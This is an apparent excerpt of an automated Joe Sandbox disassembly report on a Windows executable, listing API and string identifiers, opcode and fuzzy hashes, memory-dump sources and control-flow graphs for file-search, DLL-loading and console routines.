                          • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                          • String ID: PNG
                          • API String ID: 541704414-364855578
                          • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                          • Instruction ID: a644f0370fcc7b91dd9c459b209a960ac1fcb7db143d2039af7ca2db587c8684
                          • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                          • Instruction Fuzzy Hash: 3C412E25B19F0281FA84AB66AC4437AE7A1AF85BB0F854435CD0E47364EF7CD44CD720
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: __tmp_reference_source_
                          • API String ID: 3668304517-685763994
                          • Opcode ID: 01d915aa7671a4fc05364d19b5dc884dc9aa7e92a75a406f9595f649af81a8c0
                          • Instruction ID: 22767bf929e583c4d8bb1faaed8563d1b73044fd29af479202301941be2cfe81
                          • Opcode Fuzzy Hash: 01d915aa7671a4fc05364d19b5dc884dc9aa7e92a75a406f9595f649af81a8c0
                          • Instruction Fuzzy Hash: EFE27562A08AC296FA64EB35F8403AFE762FB41760F904136DB9D036A5DF3CE459D710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: CMT
                          • API String ID: 3668304517-2756464174
                          • Opcode ID: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
                          • Instruction ID: 2db13866680f2d4589da2f9203b7bba744cf9f98b8e4e9da2b4d8f4e1b343c1e
                          • Opcode Fuzzy Hash: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
                          • Instruction Fuzzy Hash: D8E2F7A2B09A8286FB14EB75E8502FFE7A1FB457A4F844035DA5E43695DF3CE058D320

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3769 7ff7161240bc-7ff7161240f3 3770 7ff7161240f9-7ff716124101 3769->3770 3771 7ff7161241d2-7ff7161241df FindNextFileW 3769->3771 3772 7ff716124103 3770->3772 3773 7ff716124106-7ff716124118 FindFirstFileW 3770->3773 3774 7ff7161241e1-7ff7161241f1 GetLastError 3771->3774 3775 7ff7161241f3-7ff7161241f6 3771->3775 3772->3773 3773->3775 3778 7ff71612411e-7ff716124146 call 7ff716126a0c 3773->3778 3779 7ff7161241ca-7ff7161241cd 3774->3779 3776 7ff7161241f8-7ff716124200 3775->3776 3777 7ff716124211-7ff716124253 call 7ff71614797c call 7ff71611129c call 7ff716128090 3775->3777 3781 7ff716124202 3776->3781 3782 7ff716124205-7ff71612420c call 7ff7161120b0 3776->3782 3805 7ff71612428c-7ff7161242e6 call 7ff71612f168 * 3 3777->3805 3806 7ff716124255-7ff71612426c 3777->3806 3789 7ff716124148-7ff716124164 FindFirstFileW 3778->3789 3790 7ff716124167-7ff716124170 3778->3790 3784 7ff7161242eb-7ff71612430e call 7ff716142320 3779->3784 3781->3782 3782->3777 3789->3790 3793 7ff7161241a9-7ff7161241ad 3790->3793 3794 7ff716124172-7ff716124189 3790->3794 3793->3775 3798 7ff7161241af-7ff7161241be GetLastError 3793->3798 3796 7ff71612418b-7ff71612419e 3794->3796 3797 7ff7161241a4 call 7ff71614220c 3794->3797 3796->3797 3800 7ff716124315-7ff71612431b call 7ff716147904 3796->3800 3797->3793 3802 7ff7161241c8 3798->3802 3803 7ff7161241c0-7ff7161241c6 3798->3803 3802->3779 3803->3779 3803->3802 3805->3784 3809 7ff716124287 call 7ff71614220c 3806->3809 3810 7ff71612426e-7ff716124281 3806->3810 3809->3805 3810->3809 3813 7ff71612430f-7ff716124314 call 7ff716147904 3810->3813 3813->3800
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                          • String ID:
                          • API String ID: 474548282-0
                          • Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                          • Instruction ID: b30bc2bed522e144d35007d61454b23541ce2ff8d3f104f48b7b220602727137
                          • Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                          • Instruction Fuzzy Hash: E761B862A09E4185FA10AB29FC4027EA372FB957B4F905335EAAD436D9DF3CD488D710
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID: CMT
                          • API String ID: 0-2756464174
                          • Opcode ID: bb8f32dfb39c41a2f4cffe25f113d86e3364d78267da2167cd0a984ef8db8d77
                          • Instruction ID: 804825779e8fd4825430530799b4842ed78bf1b11ab7c7a2eb4be9347d96d5f2
                          • Opcode Fuzzy Hash: bb8f32dfb39c41a2f4cffe25f113d86e3364d78267da2167cd0a984ef8db8d77
                          • Instruction Fuzzy Hash: 5142E3A2B08A8187FB18EB74E9502FEA7A1EB11364F800536DB5E53696DF3CE45CD350
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                          • Instruction ID: a5140f827587b21f8b7210f44033972b8684dd0107d4e01ce212365e79b61057
                          • Opcode Fuzzy Hash: d815108fe1d55ff87d4c2cc37bd82faefe2d830e8a86587ef2118bcfed6bbcfe
                          • Instruction Fuzzy Hash: A3E11626A09A828AFB60EF28B8442BEB790FB48768F444135DB8F47745DE3CE549D314
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
                          • Instruction ID: 5fea727997cc3ddfcc5bc9c0c58b315baf98b2d6382fdedde75a758f6fc7ab65
                          • Opcode Fuzzy Hash: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
                          • Instruction Fuzzy Hash: ECB1D5A2B05BC592EE58EA66E9087EAA391F705FE4F848036DE0E07741DF3CE159D314
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                          • String ID:
                          • API String ID: 3340455307-0
                          • Opcode ID: 645ce3c779993beb1afb80abf8d7c73334c7791ae0f497f4c6919d42dc23d689
                          • Instruction ID: 6c12528a9332316c328a87728d302b37be018f31942e53d4b86fdc8201048b66
                          • Opcode Fuzzy Hash: 645ce3c779993beb1afb80abf8d7c73334c7791ae0f497f4c6919d42dc23d689
                          • Instruction Fuzzy Hash: 4F41F622B16A5286FB64EF21FD4076BA263BBC4B94F944038DE4E07794DE3CE44A9714

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff71612dfd0-7ff71612e024 call 7ff716142450 GetModuleHandleW 3 7ff71612e07b-7ff71612e3a5 0->3 4 7ff71612e026-7ff71612e039 GetProcAddress 0->4 7 7ff71612e3ab-7ff71612e3b4 call 7ff71614b788 3->7 8 7ff71612e503-7ff71612e521 call 7ff716126454 call 7ff716127df4 3->8 5 7ff71612e03b-7ff71612e04a 4->5 6 7ff71612e053-7ff71612e066 GetProcAddress 4->6 5->6 6->3 10 7ff71612e068-7ff71612e078 6->10 7->8 14 7ff71612e3ba-7ff71612e3fd call 7ff716126454 CreateFileW 7->14 20 7ff71612e525-7ff71612e52f call 7ff7161251a4 8->20 10->3 21 7ff71612e4f0-7ff71612e4fe CloseHandle call 7ff716111fa0 14->21 22 7ff71612e403-7ff71612e416 SetFilePointer 14->22 28 7ff71612e531-7ff71612e53c call 7ff71612dd88 20->28 29 7ff71612e564-7ff71612e5ac call 7ff71614797c call 7ff71611129c call 7ff716128090 call 7ff716111fa0 call 7ff7161232bc 20->29 21->8 22->21 24 7ff71612e41c-7ff71612e43e ReadFile 22->24 24->21 27 7ff71612e444-7ff71612e452 24->27 32 7ff71612e458-7ff71612e4ac call 7ff71614797c call 7ff71611129c 27->32 33 7ff71612e800-7ff71612e807 call 7ff716142624 27->33 28->29 38 7ff71612e53e-7ff71612e562 CompareStringW 28->38 71 7ff71612e5b1-7ff71612e5b4 29->71 50 7ff71612e4c3-7ff71612e4d9 call 7ff71612d0a0 32->50 38->29 42 7ff71612e5bd-7ff71612e5c6 38->42 42->20 45 7ff71612e5cc 42->45 48 7ff71612e5d1-7ff71612e5d4 45->48 51 7ff71612e63f-7ff71612e642 48->51 52 7ff71612e5d6-7ff71612e5d9 48->52 60 7ff71612e4ae-7ff71612e4be call 7ff71612dd88 50->60 61 7ff71612e4db-7ff71612e4eb call 7ff716111fa0 * 2 50->61 56 7ff71612e648-7ff71612e65b call 7ff716127eb0 call 7ff7161251a4 51->56 57 7ff71612e7c2-7ff71612e7ff call 7ff716111fa0 * 2 call 7ff716142320 51->57 58 7ff71612e5dd-7ff71612e62d call 7ff71614797c call 7ff71611129c call 7ff716128090 call 7ff716111fa0 call 7ff7161232bc 52->58 82 7ff71612e661-7ff71612e701 call 7ff71612dd88 * 2 call 7ff71612aae0 call 7ff71612da98 call 7ff71612aae0 call 7ff71612dc2c call 7ff7161387ac call 7ff7161119e0 56->82 83 7ff71612e706-7ff71612e753 call 7ff71612da98 AllocConsole 56->83 108 7ff71612e63c 58->108 109 7ff71612e62f-7ff71612e638 58->109 60->50 61->21 76 7ff71612e5ce 71->76 77 7ff71612e5b6 71->77 76->48 77->42 97 7ff71612e7b4-7ff71612e7bb call 7ff7161119e0 ExitProcess 82->97 94 7ff71612e7b0 83->94 95 7ff71612e755-7ff71612e7aa GetCurrentProcessId AttachConsole call 7ff71612e868 call 7ff71612e858 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->97 95->94 108->51 109->58 111 7ff71612e63a 109->111 111->51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                          • API String ID: 1496594111-2013832382
                          • Opcode ID: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                          • Instruction ID: 0850d2f875eb7b12806ace7e771f1b5aca876310ccad65b2a1b909b0e37386f7
                          • Opcode Fuzzy Hash: 468c4a7f069b7598ff125167d5f4f846522f64d48354b40e84144950afa66450
                          • Instruction Fuzzy Hash: F1321831A09F8299FB11AB24FC401EAB3B5FB46364F900636DA4D46769EF3CD259D360
                          APIs
                            • Part of subcall function 00007FF716128E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716128F8D
                          • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF716129F75
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612A42F
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612A435
                            • Part of subcall function 00007FF716130BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF716130B44), ref: 00007FF716130BE9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                          • API String ID: 3629253777-3268106645
                          • Opcode ID: bd6ca6df72a9de109cab29b81db34f89513464c1785e7f9e7d7771b39afdabc3
                          • Instruction ID: c3ca2a9b8c09999983bdd8c023e0a6a3ccb0347963e7e76bad5fd31ea05d7ae7
                          • Opcode Fuzzy Hash: bd6ca6df72a9de109cab29b81db34f89513464c1785e7f9e7d7771b39afdabc3
                          • Instruction Fuzzy Hash: C362C562A18E82C5FB10EB29E8441BFA366FB407A4FE04539DA4D47695EF3CE548D350

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1910 7ff716141900-7ff716141989 call 7ff716141558 1913 7ff71614198b-7ff7161419af call 7ff716141868 RaiseException 1910->1913 1914 7ff7161419b4-7ff7161419d1 1910->1914 1920 7ff716141bb8-7ff716141bd5 1913->1920 1916 7ff7161419e6-7ff7161419ea 1914->1916 1917 7ff7161419d3-7ff7161419e4 1914->1917 1919 7ff7161419ed-7ff7161419f9 1916->1919 1917->1919 1921 7ff716141a1a-7ff716141a1d 1919->1921 1922 7ff7161419fb-7ff716141a0d 1919->1922 1923 7ff716141ac4-7ff716141acb 1921->1923 1924 7ff716141a23-7ff716141a26 1921->1924 1934 7ff716141b89-7ff716141b93 1922->1934 1935 7ff716141a13 1922->1935 1925 7ff716141acd-7ff716141adc 1923->1925 1926 7ff716141adf-7ff716141ae2 1923->1926 1927 7ff716141a28-7ff716141a3b 1924->1927 1928 7ff716141a3d-7ff716141a52 LoadLibraryExA 1924->1928 1925->1926 1930 7ff716141ae8-7ff716141aec 1926->1930 1931 7ff716141b85 1926->1931 1927->1928 1932 7ff716141aa9-7ff716141ab2 1927->1932 1928->1932 1933 7ff716141a54-7ff716141a67 GetLastError 1928->1933 1938 7ff716141aee-7ff716141af2 1930->1938 1939 7ff716141b1b-7ff716141b2e GetProcAddress 1930->1939 1931->1934 1944 7ff716141abd 1932->1944 1945 7ff716141ab4-7ff716141ab7 FreeLibrary 1932->1945 1940 7ff716141a69-7ff716141a7c 1933->1940 1941 7ff716141a7e-7ff716141aa4 call 7ff716141868 RaiseException 1933->1941 1942 7ff716141bb0 call 7ff716141868 1934->1942 1943 7ff716141b95-7ff716141ba6 1934->1943 1935->1921 1938->1939 1946 7ff716141af4-7ff716141aff 1938->1946 1939->1931 1949 7ff716141b30-7ff716141b43 GetLastError 1939->1949 1940->1932 1940->1941 1941->1920 1952 7ff716141bb5 1942->1952 1943->1942 1944->1923 1945->1944 1946->1939 1950 7ff716141b01-7ff716141b08 1946->1950 1954 7ff716141b5a-7ff716141b81 call 7ff716141868 RaiseException call 7ff716141558 1949->1954 1955 7ff716141b45-7ff716141b58 1949->1955 1950->1939 1957 7ff716141b0a-7ff716141b0f 1950->1957 1952->1920 1954->1931 1955->1931 1955->1954 1957->1939 1959 7ff716141b11-7ff716141b19 1957->1959 1959->1931 1959->1939
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                          • String ID: H
                          • API String ID: 3432403771-2852464175
                          • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                          • Instruction ID: 1c4790953343c6c54ae1d241a65967ff69a0f43da05c2952cce676facbefe681
                          • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                          • Instruction Fuzzy Hash: 50915C32B05F528AFB50DF65E8412B9A3B1BB08BA9B854435DE0D17758EF38E449D320

                          Control-flow Graph

                          • Executed
                          • Not Executed
